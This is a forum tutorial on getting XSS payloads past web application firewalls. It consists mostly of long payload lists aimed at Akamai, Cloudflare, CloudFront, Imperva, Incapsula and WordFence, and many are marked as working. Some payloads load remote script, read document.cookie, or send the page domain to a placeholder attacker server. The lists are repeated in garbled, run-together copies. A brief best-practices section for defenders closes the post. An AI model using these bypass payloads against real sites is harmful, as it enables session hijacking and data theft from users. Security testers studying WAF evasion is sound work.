kahmeleone
Algorithm Innovator
LEVEL 1
500 XP
Hey Folks
!! In this tutorial, we will describe some of the techniques commonly used by hackers to bypass Web Application Firewalls (WAF) during XSS exploitation.Let’s See
!!Introduction Web Application Firewalls (WAFs) are essential security components designed to protect web applications from various types of attacks, including Cross-Site Scripting (XSS). However, sophisticated attackers often find ways to bypass WAFs, especially when it comes to injecting malicious XSS payloads. In this article, we’ll explore some techniques used to bypass WAFs and execute XSS payloads successfully.
Understanding XSS and WAFs Cross-Site Scripting (XSS) is a type of injection attack where an attacker injects malicious scripts into content that is then served to users. These scripts can steal user data, hijack sessions, or perform unauthorized actions on behalf of the user.
WAFs are designed to filter and monitor HTTP requests, blocking any malicious attempts based on predefined rules or learning algorithms. However, WAFs are not foolproof, and attackers constantly develop new methods to evade them.
Common WAF Bypass Techniques
- Obfuscation: Attackers often obfuscate their XSS payloads to bypass WAF detection. Techniques like encoding the payload in different formats (e.g., HTML entities, Base64) or breaking up the script with comments or unnecessary characters can trick the WAF into allowing the payload through.
<img src=x onerror="/*<![CDATA[*/alert(1)/*]]>*/">1<img src=xonerror="/*<![CDATA[*/alert(1)/*]]>*/">
- Using Alternate Event Handlers: WAFs may specifically filter common event handlers like
orCode:onload
. Attackers can use less common event handlers that may not be included in the WAF’s rule set.Code:onerror
1<div style="width:expression(alert(1))"></div>
- Polyglot Payloads: A polyglot XSS payload is one that can be interpreted in multiple contexts, increasing its chances of bypassing a WAF. These payloads are designed to execute regardless of whether they are processed as HTML, JavaScript, or another scripting language.
<script>/*</script><svg onload=alert(1)>*/1<script>/*</script><svg onload=alert(1)>*/
- Payload Splitting: Splitting the payload into multiple parts can sometimes evade detection, as WAFs may not correctly reassemble the script in its entirety.
<img src='1' onerror='ja'+'vascript:alert(1)'>1<img src='1'onerror='ja'+'vascript:alert(1)'>
- Manipulating Headers: Some WAFs inspect specific HTTP headers for malicious content. By manipulating or injecting headers in a non-standard way, an attacker might bypass the WAF’s inspection process.
GET / HTTP/1.1
Host: victim.com
Content-Length: 0
X-Forwarded-For: '><script>alert(1)</script>1234GET/HTTP/1.1Host:victim.comContent-Length:0X-Forwarded-For:'><script>alert(1)</script>
Now let’s have a look some waf bypass pyaloads
!!Akamai XSS Payloads
<style>@keyframes a{}b{animation:a;}</style><b/onanimationstart=prompt`${document.domain}`>
<marquee+loop=1+width=0+onfinish='new+Function`al\ert`1``'>
<svg><circle><set onbegin=prompt(1) attributename=fill>
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
"%3balert`1`%3b"
asd"`> onpointerenter=x=prompt,x`XSS`
<x onauxclick=import('//1152848220/')>click
<x onauxclick=a=alert,a(domain)>click -@niksthehacker
<x onauxclick=import('//1152848220/')>click
<x onauxclick=import('//xss/')>click
\"<>onauxclick<>=(eval)(atob(`YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==`))>+<sss
{{constructor.constructor(alert`1`)()}}
javascript:new%20Function`al\ert`1``;
<script>Object.prototype.BOOMR = 1;Object.prototype.url='https://portswigger-labs.net/xss/xss.js'</script> -
Loading…
portswigger.net
<script>Object.prototype.BOOMR=1;Object.prototype.url='https://portswigger-labs.net/xss/xss.js'</script> -
https://portswigger.net/web-security/cross-site-scripting/cheat-sheet">Click-@stealthybugs
Cloudflare XSS payloads
Click Here!
Dec: <svg onload=prompt%26%230000000040document.domain)>
Hex: <svg onload=prompt%26%23x000000028;document.domain)>
xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
X
<--%253cimg%20onerror=alert(1)%20src=a%253e --!>
javascript:{ alert`0` }
1'"><img/src/onerror=.1|alert``>
<img src=x onError=import('//1152848220/')>
%2sscript%2ualert()%2s/script%2u
<svg on onload=(alert)(document.domain)>
<img ignored=() src=x onerror=prompt(1)>
<svg onx=() onload=(confirm)(1)>
“><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;
<svg on =i onload=alert(domain) (working)
<svg/onload=location/**/='https://your.server/'+document.domain>
<svg onx=() onload=window.alert?.()> (working)
test",prompt%0A/*HelloWorld*/(document.domain) (working)- @Brutelogic
"onx+%00+onpointerenter%3dalert(domain)+x" (working)- @Brutelogic
"><svg%20onload=alert%26%230000000040"1")> (working)- @IamRenganathan
%27%09);%0d%0a%09%09[1].find(alert)//
"><img src=1 onmouseleave=print()> - @itsgeekymonk
<svg on onload=(alert)(document.domain)> -@zapstiko
<svg/on%20onload=alert(1)> (working) -@aufzayed
<img/src=x onError="`${x}`;alert(`Ex.Mi`);"> -@ex_mi1234567891011121314151617181920212223242526Click Here!Dec: <svg onload=prompt%26%230000000040document.domain)>Hex: <svg onload=prompt%26%23x000000028;document.domain)>xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>X<--%253cimg%20onerror=alert(1)%20src=a%253e--!>javascript:{alert`0`}1'"><img/src/onerror=.1|alert``><img src=x onError=import('//1152848220/')>%2sscript%2ualert()%2s/script%2u<svg on onload=(alert)(document.domain)><img ignored=()src=xonerror=prompt(1)><svg onx=()onload=(confirm)(1)>“><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;<svg on=ionload=alert(domain)(working)<svg/onload=location/**/='https://your.server/'+document.domain><svg onx=()onload=window.alert?.()>(working)test",prompt%0A/*HelloWorld*/(document.domain) (working)- @Brutelogic"onx+%00+onpointerenter%3dalert(domain)+x" (working)- @Brutelogic"><svg%20onload=alert%26%230000000040"1")>(working)-@IamRenganathan%27%09);%0d%0a%09%09[1].find(alert)//"><img src=1 onmouseleave=print()> - @itsgeekymonk<svg on onload=(alert)(document.domain)> -@zapstiko<svg/on%20onload=alert(1)> (working) -@aufzayed<img/src=x onError="`${x}`;alert(`Ex.Mi`);">-@ex_mi
Cloudfront XSS payloads
">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(`cloudfrontbypass`)//'>
">'><details/open/ontoggle=confirm('XSS')>
6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/
"><img src=x onerror=confirm(1);>1234">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(`cloudfrontbypass`)//'>">'><details/open/ontoggle=confirm('XSS')>6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/"><img src=xonerror=confirm(1);>
Imperva XSS payloads
<x/onclick=globalThis['\u0070r\u006f'+'mpt']<)>clickme (working)-Pinaki @0xInfection(Make sure to URL encode the payload properly)
tarun"><x/onafterscriptexecute=confirm%26lpar;)// -@sratarun
[0][v+a+e+s](e+s+v+h+n)(/infected/.source)]click (workin)Pinaki @0xInfection (Make sure the applications decodes the payload from encoded)
<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];"> - @xsspayloads
<svg onload\r\n=$.globalEval("al"+"ert()");>
<bleh/onclick=top[/al/.source+/ert/.source]	``>click Pinaki @0xInfection
<sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;// -@AldenAous
tap12345678<x/onclick=globalThis['\u0070r\u006f'+'mpt']<)>clickme(working)-Pinaki@0xInfection(Make sure toURL encode the payload properly)tarun"><x/onafterscriptexecute=confirm%26lpar;)// -@sratarunclick (workin)Pinaki @0xInfection (Make sure the applications decodes the payload from encoded)<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];"> - @xsspayloads<svg onload\r\n=$.globalEval("al"+"ert()");><bleh/onclick=top[/al/.source+/ert/.source]	``>click Pinaki @0xInfection<sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;// -@AldenAoustap
Incapsula XSS payloads
<iframe/onload='this["src"]="javas	cript:al"+"ert``"';>
<iframe/onload="var b = 'document.domain)'; var a = 'JaV' + 'ascRipt:al' + 'ert(' + b; this['src']=a">
<img/src=q onerror='new Function`al\ert`1``'>
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
<svg onload\r\n=$.globalEval("al"+"ert()");>
[1].map(alert) or (alert)(1)
<"><details/open/ontoggle="jAvAsCrIpT:alert(/xss-by-tarun/)">XXXXX
[1].find(confirm)
<svg/onload=self[`aler`%2b`t`]`1`>
%22%3E%3Cobject%20data=data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==%3E%3C/object%3E
'-[document.domain].map(alert)-'123456789101112<iframe/onload='this["src"]="javas	cript:al"+"ert``"';><iframe/onload="var b = 'document.domain)'; var a = 'JaV' + 'ascRipt:al' + 'ert(' + b; this['src']=a"><img/src=q onerror='newFunction`al\ert`1``'><object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object><svg onload\r\n=$.globalEval("al"+"ert()");>[1].map(alert) or (alert)(1)<"><details/open/ontoggle="jAvAsCrIpT:alert(/xss-by-tarun/)">XXXXX[1].find(confirm)<svg/onload=self[`aler`%2b`t`]`1`>%22%3E%3Cobject%20data=data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==%3E%3C/object%3E'-[document.domain].map(alert)-'
WordFence XSS payloads
ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6 -@naglinagli
<meter onmouseover="alert(1)" -@manjith27945363
'">><meter onmouseover="alert(1)"" -@manjith27945363
>><marquee loop=1 width=0 onfinish=alert(1)> -@manjith27945363
Wordfence 7.4.2
-@brutelogic
please%20click%20here1234567ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6-@naglinagli<meter onmouseover="alert(1)"-@manjith27945363'">><meter onmouseover="alert(1)""-@manjith27945363>><marquee loop=1width=0onfinish=alert(1)>[email protected] -@brutelogicplease%20click%20here
Best Practices for Defenders While understanding how attackers bypass WAFs is crucial, it’s equally important for defenders to continuously update WAF rules, employ multiple layers of security, and conduct regular security assessments.
- Regular Updates: Keep WAF signatures and rules up-to-date to cover new and emerging threats.
- Defense-in-Depth: Utilize a combination of security mechanisms (e.g., input validation, Content Security Policy) alongside the WAF for better protection.
- Security Testing: Regularly perform penetration testing and security assessments to identify and patch any vulnerabilities that could be exploited.
Conclusion Bypassing a WAF with XSS payloads requires creativity and a deep understanding of both the WAF’s limitations and the web application itself. While WAFs provide a strong line of defense, they should not be solely relied upon. A layered security approach combined with continuous monitoring and testing is essential to defend against these sophisticated attacks.
Additionally
!! If you are a beginner and having some difficulty understanding XSS vulnerabilities in depth, you can visit hereAbout the AuthorShubham Goyal Certified Ethical Hacker, information security analyst, penetration tester and researcher. Can be Contact on Linkedin.